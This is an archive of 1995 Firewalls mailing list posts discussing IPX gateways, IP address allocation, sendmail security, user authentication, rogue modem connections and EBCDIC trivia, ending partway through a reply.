Received: by damark.com (5.65/1.2-eef) id AA00556; Wed, 13 Sep 95 07:43:47 -0500
Message-Id: <9509131243.AA00556@damark.com>
From: "william.wells"
To: FIREWALLS
Subject: IPX firewall?
Date: Wed, 13 Sep 95 07:04:00 +6C
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Another way to convert to IP is to use Novell/IP instead of Novell/IPX; although this puts the IP stacks on the clients (but removes the IPX stack). Works great here (we are using FTP Software's TCP/IP stack on the PCs). The problem with it, and I wonder about the others, is that it uses UDP which is generally shunned by firewalls.

>From: Andrew Foss
>At 08:23 AM 9/12/95 -0700, Bradley E. Hubbard wrote:
>>I'm wondering if anyone knows of any firewall products that have been
>>developed in and for an IPX environment?
>Internet Junction (recently purchased by Cisco) has a gateway that converts
>IPX to IP. It's available for Solaris, HP-UX, IRX ...
>It has the advantage of not putting TCP stacks on the IPX clients, but it's
>not the right solution for many people.
William Wells
Manager, Technical Support
Damark International, Inc

From firewalls-owner Wed Sep 13 06:02:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16017 for firewalls-outgoing; Wed, 13 Sep 1995 05:46:38 -0700
Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16010 for ; Wed, 13 Sep 1995 05:46:34 -0700
Received: by gateway.damark.com; id HAA11153; Wed, 13 Sep 1995 07:45:12 -0500
Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme011143; Wed, 13 Sep 95 07:44:55 -0500
Received: by damark.com (5.65/1.2-eef) id AA00543; Wed, 13 Sep 95 07:43:44 -0500
Message-Id: <9509131243.AA00543@damark.com>
From: "william.wells"
To: FIREWALLS
Subject: firewall with only one IP address ???
Date: Wed, 13 Sep 95 06:49:00 +6C
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We got our IP address prior to choosing our provider so we didn't have that problem; it is an issue though. In retrospect, since all the Internet traffic flows through a firewall, we are only externally using 1 IP address; internally, we are using more of those 256 addresses. Since IP lookup is via DNS and our internal systems generally use "internal only" IP addresses, I've since determined that switching to a different Class C wouldn't really be a significant problem -- a couple of routers, systems, DNS changes, and coordinating with the root DNS server gods and we'd be done. Still, one does get possessive of one's IP address networks.....

>From: billcurr@cyberspace.com
>The bummer with that is, (as UUNET just informed me this morning) if I
>ever switch providers or dump UUNET, they want their 256 IP addresses BACK.
>
>>Agreed with Don:
>>
>>What's the deal? A class C will give you 256 IP addresses and most
>>corporations can qualify for this. Maybe you should go to some of the
>>larger ISPs if you're having a problem.
William Wells
Manager, Technical Support
Damark International, Inc

From firewalls-owner Wed Sep 13 06:53:11 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16593 for firewalls-outgoing; Wed, 13 Sep 1995 06:03:49 -0700
Received: from gateway.kellogg.com (gateway.kellogg.com [198.108.149.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16580 for ; Wed, 13 Sep 1995 06:03:43 -0700
Received: from cornelius.scp.com (kellogg.com) by gateway.kellogg.com with SMTP id AA06066 (InterLock SMTP Gateway 3.0 for ); Wed, 13 Sep 1995 09:00:13 -0400
Received: from ccMail by cornelius.scp.com (IMA Internet Exchange v1.04) id 056d3c80; Wed, 13 Sep 95 08:51:20 -0400
Mime-Version: 1.0
Date: Wed, 13 Sep 1995 08:48:11 -0400
Message-Id: <056d3c80@cornelius.scp.com>
From: Alex.Eveleigh@kellogg.com (Alex Eveleigh)
Subject: Monitoring Activity on the Internet
To: firewalls@greatcircle.com
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Description: cc:Mail note part
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

We are using a UNIX firewall machine for our Internet connection as well as a filtering router. This connects us to our service provider who then supplies our connection to the Internet. Our connection only allows outbound traffic with the exception of E-Mail.

I would like to get some opinions on how easy it would be for someone to monitor what information is being accessed on the Internet by our company. For example, how easy would it be for our competition to monitor all sites that people in our company are accessing and what information we are pulling off the Internet?
Thanks in advance,

Alex

From firewalls-owner Wed Sep 13 06:58:10 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17438 for firewalls-outgoing; Wed, 13 Sep 1995 06:28:55 -0700
Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17431 for ; Wed, 13 Sep 1995 06:28:51 -0700
Received: (proberts@localhost) by clark.net (8.6.12/8.6.5) id JAA12126; Wed, 13 Sep 1995 09:27:23 -0400
Date: Wed, 13 Sep 1995 09:27:23 -0400 (EDT)
From: "Paul D. Robertson"
To: Christian Kuhtz
cc: Bret McDanel, firewalls@GreatCircle.COM
Subject: Re: Secure version of Sendmail
In-Reply-To: <199509130502.AAA24232@psisa.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 13 Sep 1995, Christian Kuhtz wrote:

> Unless you tell it to, no. As soon as you start running mail gateways, you have
> the potential of running into a denial of service problem anyways. Maybe not on
> the hub (firewall) itself, but usually somewhere down the road.

Agreed.

> And Sendmail is the only useful mail package out there. I'd be happy
> to adopt anything which offers me Sendmail functionality in a more secure
> fashion. So, let's get things into perspective here.
>

I strongly disagree with this. 'smail' is a perfectly useful mail package, granted the docs leave something to be desired, but its functionality is greatly useful, and it hasn't had nearly the same level of security problems that sendmail has been vulnerable to.

> Give me a break, can we please stay away from system dependent holes when
> discussing individual packages? And let's bring some common sense into
> all these discussions.

System dependent holes can be important when a particular package is vulnerable to it, and others aren't.
This list is constantly vulnerable to denial of service attacks on common sense; I doubt that plea will get too far, after all, these are for the most part religious issues.

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280

From firewalls-owner Wed Sep 13 07:11:51 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17576 for firewalls-outgoing; Wed, 13 Sep 1995 06:34:08 -0700
Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17569 for ; Wed, 13 Sep 1995 06:34:00 -0700
Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA17074; Wed, 13 Sep 1995 08:29:16 -0400
Date: Wed, 13 Sep 1995 08:29:16 -0400
From: Ted Doty
Message-Id: <199509131229.IAA17074@kgbvax.network.com>
To: frankw@in.net, ophir@connectsoft.com
Subject: Re: User Authentication
In-Reply-To: Mail from 'frankw@in.net (Frank Willoughby)' dated: Tue, 12 Sep 95 21:59:02 -0400
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

frankw@in.net (Frank Willoughby) writes:

> I would not recommend relying on strong authentication only.
>
> Any hacker worth their salt will let the user log in using strong
> authentication and then take over the session after the user has
> logged in to their system. It is better to rely on user -> firewall
> and/or firewall -> firewall encryption (using strong authentication,
> of course) than to rely on strong authentication only.

Another possibility is user -> server encryption or user -> user encryption. Certainly the IPSec proposed standards show considerable possibility for the first. See RFCs 1824-1829. User -> user is probably going to be more difficult, due to expected problems with ITAR licensing.
--
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation    | phone: +1 301 596-2270
8965 Guilford Road, Suite 250            | fax: +1 410 381-3320
Columbia, MD, 21046 USA                  | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Wed Sep 13 07:37:51 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17378 for firewalls-outgoing; Wed, 13 Sep 1995 06:27:17 -0700
Received: from arthur.crpht.lu (arthur.crpht.lu [158.64.4.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA17371 for ; Wed, 13 Sep 1995 06:27:01 -0700
Received: from cnsmac1.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA23562; Wed, 13 Sep 95 15:25:39 +0200
X-Sender: security@arthur.crpht.lu
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 13 Sep 1995 15:29:13 +0100
To: Firewalls@GreatCircle.COM
From: security@crpht.lu (Bruno MAMER)
Subject: Re: Corporate Audits
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>I'm not sure if I should name names or not -- it's not my place to do
>>so -- but I know for certain that at least one large industrial outfit
>>was barred by their auditors from connecting to the Internet until they
>>had a heavy-duty firewall in place.
>
>Which, if they're not VERY careful, merely means that the organization is
>going to have a dozen or more "underground" connections spring up at
>various sites and within various groups, each of which individually is
>probably fairly insecure. It's just too easy for somebody to go get a
>modem and phone line (or, heck, even an ISDN or frame relay line), and
>service from some local or national service provider.
>They'll be in place
>and in use and invaluable to the groups using them, and (alas) probably not
>properly secured.
>
>How to deal with this varies by organization. However, blanket "Thou shalt
>not connect to the Internet" directives are very difficult to enforce, and
>seldom have the desired effect. You've got to provide useful alternatives
>(like a useful connection through a properly secured central firewall).
>The key is, the USERS determine the definition of "useful"; if they
>determine that what you're offering doesn't meet their needs, they'll go
>around you.

I'm no network expert, so correct me if I'm wrong, but isn't it easy to detect if someone on a LAN connects to the Internet (or a WAN) through a modem connection? Won't there be on the LAN some unusual traffic (I mean there addresses coming from outside the LAN) which should be detected if correct monitoring is done?

Second point: yes, maybe it is difficult to enforce a "no internet connection" policy, but isn't that exactly the role of a security policy? I mean if you point out in your policy that it is forbidden to connect to the internet, that does mean for those working in the company that it would be considered a professional fault to do so (as would be giving out information or whatever)? Of course it's not 100% secure but that is a beginning. If not, what's the use of having a security policy?
Just thinking about it,

Bruno
_________________________________________________________________________
Bruno MAMER                                  bruno.mamer@crpht.lu
Centre de Recherche Public Henri Tudor       Computing and Network Services
Our local archive on security:
http://www.crpht.lu/CNS/html/PubServ/Security/security-home.html
-------------------------------------------------------------------------

From firewalls-owner Wed Sep 13 07:39:47 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19009 for firewalls-outgoing; Wed, 13 Sep 1995 07:19:54 -0700
Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19000 for ; Wed, 13 Sep 1995 07:19:49 -0700
Received: (from chk@localhost) by psisa.com (8.6.12/guess) id JAA29598; Wed, 13 Sep 1995 09:17:43 -0500
Message-Id: <199509131417.JAA29598@psisa.com>
Subject: Re: User Authentication
To: afoss@translation.com (Andrew Foss)
Date: Wed, 13 Sep 1995 09:17:42 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199509130031.RAA05121@translation.com> from "Andrew Foss" at Sep 12, 95 05:31:28 pm
From: chk@psa.pencom.com (Christian Kuhtz)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Are there any applications out there public domain or otherwise that do some
> sort of basic user/password authentication for network users?
> I've heard the name Radius used, but I thought they made displays?

Kerberos?
:)

Best Regards,
Chris

--
 ___  ____ __
| _ \/ __/| \     Christian Kuhtz                          +1 914-684-4467
| _/\__ \| \ \    Pencom System Administration Services    fax: +1 914-684-3791
|_| /___/|_|__\   on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Wed Sep 13 08:32:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20886 for firewalls-outgoing; Wed, 13 Sep 1995 08:02:56 -0700
Received: from lobster.wellfleet.com (lobster.wellfleet.com [192.32.253.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA20876 for ; Wed, 13 Sep 1995 08:02:53 -0700
Received: from paperboy.corpeast.baynetworks.com (paperboy.wellfleet.com) by lobster.wellfleet.com (4.1/SMI-4.1) id AA26007; Wed, 13 Sep 95 11:00:24 EDT
Received: from BayNetworks.com by paperboy.corpeast.baynetworks.com (4.1/SMI-4.1) id AA15632; Wed, 13 Sep 95 11:01:32 EDT
From: Post_Office@BayNetworks.com (Post Office)
Reply-To: Post_Office@BayNetworks.com
To: Firewalls@GreatCircle.COM
Subject: NDN: Firewalls-Digest V4 #522
Date: 12 Sep 1995 23:19:14 GMT
Message-Id: <471719869.120350@BayNetworks.com>
Organization: Bay Networks
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sorry. Your message could not be delivered to:
Steve Grinder, Wellfleet Sales/Mkt (Mailbox or Conference is full.)
From firewalls-owner Wed Sep 13 08:41:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19886 for firewalls-outgoing; Wed, 13 Sep 1995 07:42:36 -0700
Received: from Fe3.rust.net (rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19879 for ; Wed, 13 Sep 1995 07:42:33 -0700
Received: from dtw-20.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id KAA19103; Wed, 13 Sep 1995 10:57:50 -0700
Date: Wed, 13 Sep 1995 10:57:50 -0700
Message-Id: <199509131757.KAA19103@Fe3.rust.net>
X-Sender: janken@rust.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
From: janken@rust.net (Kenneth J. Stephens)
Subject: Re: MVS vs the world
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Is it fair to mention that EBCDIC has no full colon ? back slash ?
>brackets ? curly brackets ? Number sign ? Exclamation point ? Requires
>all eight bits just to pass the alphabet ?
>
> So say padgett

EBCDIC full colon           = hex "7A" or binary "0111 1010"
EBCDIC back slash           = hex "61" or binary "0110 0001"
EBCDIC open curly bracket   = hex "C0" or binary "1100 0000"
EBCDIC close curly bracket  = hex "D0" or binary "1101 0000"
EBCDIC number sign          = hex "7B" or binary "0111 1011"
EBCDIC exclamation point    = hex "5A" or binary "0101 1010"

BCDIC open bracket          = hex "4D" or binary "0100 1101"
  became
EBCDIC open paren           = hex "4D" or binary "0100 1101"

BCDIC close bracket         = hex "5D" or binary "0101 1101"
  became
EBCDIC close paren          = hex "5D" or binary "0101 1101"

So say my green card. One out of six!!! Thank you for playing! Please read a few dumps and try again.

Sorry for the mostly off-topic post. We now return you to the firewalls discussion.
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                                                          []
[] Ken Stephens             Senior Capacity Planner/Data Security Officer   []
[] email: Ken_Stephens@miconsulting.com            Voice (313) 876-5081     []
[] Michigan Employment Security Commission (MESC)  Fax   (313) 876-6827     []
[] 7th Fl. I.S.                                                             []
[] 7310 Woodward Ave                                                        []
[] Detroit, MI 48202                                                        []
[]                                                                          []
[] Millennium Consulting            Your Security Policy is only            []
[] 28234 Diesing Dr.                as strong as your organization's        []
[] Madison Heights, MI 48071        commitment to it.                       []
[]                                                                          []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Wed Sep 13 09:16:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20833 for firewalls-outgoing; Wed, 13 Sep 1995 08:02:09 -0700
Received: from gw0.telebase.com (gw0.telebase.com [192.132.57.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA20825 for ; Wed, 13 Sep 1995 08:02:06 -0700
Received: from wormhole.telebase.com by gw0.telebase.com id LAA09445 for ; Wed, 13 Sep 1995 11:07:28 -0400
Received: from odo.telebase.com (bmc@odo.telebase.com [192.132.57.217]) by wormhole.telebase.com (8.6.12/8.6.9.1) with ESMTP id LAA13210; Wed, 13 Sep 1995 11:18:13 -0400
Received: (from bmc@localhost) by odo.telebase.com (8.6.10/8.6.9.1) id LAA09033; Wed, 13 Sep 1995 11:01:58 -0400
Date: Wed, 13 Sep 1995 11:01:58 -0400
From: Brian Clapper
Message-Id: <199509131501.LAA09033@telebase.com.>
To: firewalls@greatcircle.com
Subject: cc:Web, or Things To Come
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

FYI, according to the 4 Sept 1995 (V.12, N.36) issue of NetworkWorld, Lotus is getting ready to release cc:Web Mail, an NT-based server that permits cc:Mail users to access their cc:Mailboxes from anywhere on the Internet, using "any standard World-Wide Web browser."
The server runs on an NT box; access is password protected (presumably using normal browser password authentication -- the article doesn't elaborate). Once "logged in," the user can manipulate his mailbox remotely.

My favorite excerpt from the article:

    Mail users who have not seen cc:Web Mail said they are looking forward
    to checking it out.

    "Providing they have taken care of the security issues of connecting to
    the Internet, I think it is a great idea," said Scott Webster, a cc:Mail
    user with Canadian Occidental Petrol, Ltd., in Calgary, Alberta.

    And if security is a problem, Webster said users could build a firewall
    around their Internet connection to keep it safe.

Can't wait 'til our users start clamoring for this.

----
Brian Clapper, bmc@telebase.com, http://www.netaxs.com/~bmc/
I've had fun before. This isn't it.

From firewalls-owner Wed Sep 13 09:30:14 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24499 for firewalls-outgoing; Wed, 13 Sep 1995 09:27:48 -0700
Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA24489 for ; Wed, 13 Sep 1995 09:27:43 -0700
Date: Wed, 13 Sep 95 12:26 EDT
Message-ID: <9509131226.AA00415@databus.databus.com>
From: Barney Wolff
To: janken@rust.net (Kenneth J. Stephens), padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Cc: firewalls@greatcircle.com
Subject: Re: MVS vs the world
Content-Length: 873
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Date: Wed, 13 Sep 1995 10:57:50 -0700
> From: janken@rust.net (Kenneth J. Stephens)
>
> BCDIC open bracket = hex "4D" or binary "0100 1101"
> became
> EBCDIC open paren = hex "4D" or binary "0100 1101"
>
> BCDIC close bracket = hex "5D" or binary "0101 1101"
> became
> EBCDIC close paren = hex "5D" or binary "0101 1101"
>
> So say my green card.
I know it's unofficial, but my dd translates [] to hex ad bd, so there is a unique translation even for the brackets. It's quite a separate question what shows up on the screen of a genuine 3270 for some of these characters, or what gets printed.

Bigotry in either direction is non-PC :-)

Wonder how many of us still have our green cards (other than resident aliens, of course)? I do.

Barney Wolff

From firewalls-owner Wed Sep 13 09:32:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA22690 for firewalls-outgoing; Wed, 13 Sep 1995 08:38:26 -0700
Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA22680 for ; Wed, 13 Sep 1995 08:38:22 -0700
Received: (proberts@localhost) by clark.net (8.6.12/8.6.5) id LAA29267; Wed, 13 Sep 1995 11:36:52 -0400
Date: Wed, 13 Sep 1995 11:36:50 -0400 (EDT)
From: "Paul D. Robertson"
To: Bruno MAMER
cc: Firewalls@GreatCircle.COM
Subject: Re: Corporate Audits
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 13 Sep 1995, Bruno MAMER wrote:

> I'm no network expert so correct me if I'm wrong but isn't it easy to
> detect if someone on a LAN connects to Internet (or a WAN) through a modem
> connection ? Won't there be on the lan some unusual trafic (I mean there
> addresses coming from outside the lan) which should be detected if a
> correct monitoring is done ?
>

Not if the PC acts as a proxy, which is true not only of compromised PCs, but also of protocol encapsulation, a la' win95, wfw, etc., where the packets destined for the intruder are not IP packets.
This is the most likely form of attack, given that actually putting IP traffic on the network via routing necessitates the compromise of routers beyond the initial subnet, if that subnet isn't between the target host and the default routes for the network, if you are looking to target hosts outside of the subnet that the compromised PC sits on.

Also, on large multi-protocol networks, it may be impractical to monitor addresses based on protocol specific information.

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280

From firewalls-owner Wed Sep 13 09:36:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21151 for firewalls-outgoing; Wed, 13 Sep 1995 08:10:08 -0700
Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA21144 for ; Wed, 13 Sep 1995 08:10:04 -0700
Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id KAA06805 for ; Wed, 13 Sep 1995 10:04:23 -0500
Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma006802; Wed Sep 13 10:04:14 1995
Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA22660 (5.67b/IDA-1.5 for ); Wed, 13 Sep 1995 10:13:23 -0500
Date: Wed, 13 Sep 1995 10:13:23 -0500
From: Ken Hardy
Message-Id: <199509131513.AA22660@ignatz.bridge.com>
To: firewalls@greatcircle.com
Subject: Re: NT security (was: Interpreting CERT advisories)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ian Dunkin wrote:

>- On Tue, 12 Sep 1995, Ian Poynter wrote:
>
>> I think that since many of the (in)security problems on the Internet are
>> unix-related, people can all too easily build a false sense of security
>> around the "not-unix".
>> I'm just waiting for the first Windows NT problem to
>> show up on the CERT list; given the number of NT-based web servers out
>> there, I suspect it's only a matter of time.
>
>Ken Hardy posted details on this list of a security
>hole in the EMWAC NT web server a month or so ago. I understand there's
>now a fix for this particular one, but it illustrates your point.

Many (most?) Unix security holes have been the unforeseen consequences of lapses in the programming of or configuration of services layered on top of the system, not in the kernel itself. The NT EMWAC security hole about which I posted was exactly that.

The point of my post is that "not-unix != security". It is possible to poorly program and misconfigure on any system, as illustrated, and you're likely to see more of this as NT is used more for such services. You still have to know what you're doing and be able to perceive unintended uses and results. The point-n-click crowd are in for some surprises.

--
KH

From firewalls-owner Wed Sep 13 09:57:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21228 for firewalls-outgoing; Wed, 13 Sep 1995 08:11:44 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA21219 for ; Wed, 13 Sep 1995 08:11:37 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA03820; Wed, 13 Sep 95 11:04:35 -0400
Date: Wed, 13 Sep 95 11:04:34 -0400
Message-Id: <9509131504.AA03820@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: MVS vs the world
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From: Brian T. Tucker

>Without wanting in any way to get into the MVS vs UNIX argument, I think
>you are incorrect about EBCDIC.
Probably sadly out-of-date ( relying on a 1978 document and heaven knows EBCDIC had many unused byte values ) would not be surprised if it had been extended further. Does that make it EEBCDIC ? Warmly, Padgett ps (was remembering the pain of trying to pass ASCII source code from a VAX to a 370 a number of years ago - sometimes I come unstuck in time) From firewalls-owner Wed Sep 13 10:01:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24609 for firewalls-outgoing; Wed, 13 Sep 1995 09:32:09 -0700 Received: from ns.iij.ad.jp (ns.iij.ad.jp [192.244.176.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA24602 for ; Wed, 13 Sep 1995 09:32:05 -0700 Received: from shiosai.iij.ad.jp (shiosai.iij.ad.jp [192.244.176.35]) by ns.iij.ad.jp (8.6.12+2.4W/3.3W9-NS) with SMTP id BAA17617; Thu, 14 Sep 1995 01:30:37 +0900 Message-Id: <199509131630.BAA17617@ns.iij.ad.jp> To: Brian Murrell cc: firewalls@GreatCircle.COM, billcurr@cyberspace.com, davidc@ns.iij.ad.jp Subject: Re: firewall with only one IP address ??? In-reply-to: Your message of "Tue, 12 Sep 1995 13:43:57 MST." <199509122043.NAA19619@mocha.bctel.net> Date: Thu, 14 Sep 1995 01:30:37 +0900 From: David R Conrad Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Apologies, as this is not really related to firewalls, but... >> The bummer with that is, (as UUNET just informed me this morning) is if >>I ever switch providers or dump UUNET, they want their 256 IP adresses >>BACK. Yes, since that's the only way to keep the size of the global routing tables down. >go get your own 256 host class c and then have uunet route that. It is likely UUNet will refuse to route the out of block addresses and request the site renumber into the UUNet CIDR block. 
In order for a large network (i.e., the Internet) to continue to grow at its current rate, addresses must be allocated topologically so individual sites can be aggregated together, thereby hiding leaf routing information. Taking addresses with you when you switch providers and/or obtaining addresses from outside a provider block and injecting those addresses into the routing system _is_ causing the Internet to partition (routers falling over due to lack of memory or CPU power handling routing updates). Firewalls and other forms of network address translation are extremely beneficial in helping prevent the partitioning of the Internet as large numbers of addresses are hidden by one or two addresses. As a side benefit, you might get a more secure environment too... :-) [Back to our previously scheduled discussion on the merits of MVS :-)] Regards, -drc From firewalls-owner Wed Sep 13 10:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21437 for firewalls-outgoing; Wed, 13 Sep 1995 08:17:07 -0700 Received: from ns.inter.edu (NS.INTER.EDU [164.42.100.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA21430 for ; Wed, 13 Sep 1995 08:16:59 -0700 From: R@lce.org Received: from zorzal.metro.inter.edu by ns.inter.edu (AIX 3.2/UCB 5.64/4.03) id AA10010; Wed, 13 Sep 1995 11:18:05 -0400 Received: from NSTTC1/SMTPQueue by lce.org (Mercury 1.11); Wed, 13 Sep 95 11:15:49 +400 Received: from Mailqueue by NSTTC1 (Mercury 1.11); Wed, 13 Sep 95 11:15:26 +400 Organization: Locally Produced Equipment Project To: firewalls@greatcircle.com Date: Wed, 13 Sep 1995 11:15:24 AST Subject: source routing Priority: normal X-Mailer: Pegasus Mail v3.22 Message-Id: <11D946E99@lce.org> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry about the changed subject line but I had already deleted a short thread earlier, someone was asking for a program that could produce source routed packets to use in testing against a 
firewall. While looking around windows 95 I found that traceroute (tracert.exe) and ping (ping.exe) both claim in their usage blurb to be able to do loose source routing, ping also claims strict source routing. The programs aren't in the on-line help and are barely mentioned in the very thick and so far useless book with the resource kit. My guess is these came out of windows nt and would presumably be documented there. Anyone know? Ramon From firewalls-owner Wed Sep 13 10:30:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26890 for firewalls-outgoing; Wed, 13 Sep 1995 10:26:41 -0700 Received: from argo.hks.com (argo.hks.com [192.156.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA26883 for ; Wed, 13 Sep 1995 10:26:37 -0700 Received: from ragnarok.hks.com (ragnarok.hks.com [192.101.199.9]) by argo.hks.com (8.6.12/8.6.12) with ESMTP id RAA03532 for <@hks.com:firewalls@GreatCircle.COM>; Wed, 13 Sep 1995 17:25:20 GMT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) for firewalls@GreatCircle.COM id NAA09085; Wed, 13 Sep 1995 13:25:19 -0400 From: "Jim Littlefield" Message-Id: <9509131325.ZM9083@ragnarok.hks.com> Date: Wed, 13 Sep 1995 13:25:18 -0400 In-Reply-To: Barney Wolff "Re: MVS vs the world" (Sep 13, 12:26pm) References: <9509131226.AA00415@databus.databus.com> X-Mailer: Z-Mail (3.2.1 15feb95) To: firewalls@GreatCircle.COM Subject: Re: MVS vs the world Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 13, 12:26pm, Barney Wolff wrote: : : Wonder how many of us still have our green cards (other than resident : aliens, of course)? I do. I'm afraid to admit I have one AND a yellow card ;) -- Jim Littlefield "Soon anyone who's not on the World Wide Web will qualify for a government subsidy for the home-pageless." 
- Scott Adams

From firewalls-owner Wed Sep 13 10:32:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA25806 for firewalls-outgoing; Wed, 13 Sep 1995 10:03:11 -0700
Received: from interlock.mckesson.com (interlock.mckesson.com [199.221.43.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA25797 for ; Wed, 13 Sep 1995 10:03:05 -0700
Received: from [128.1.53.158] (billhost.mckesson.com) by interlock.mckesson.com with SMTP id AA04818 (InterLock SMTP Gateway 3.0 for ); Wed, 13 Sep 1995 10:01:36 -0700
Date: Wed, 13 Sep 1995 10:01:36 -0700
Message-Id: <199509131701.AA04818@interlock.mckesson.com>
Subject: Re: User Authentication
From: Bill Husler
To:
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Any hacker worth their salt will let the user log in using strong
>authentication and then take over the session after the user has
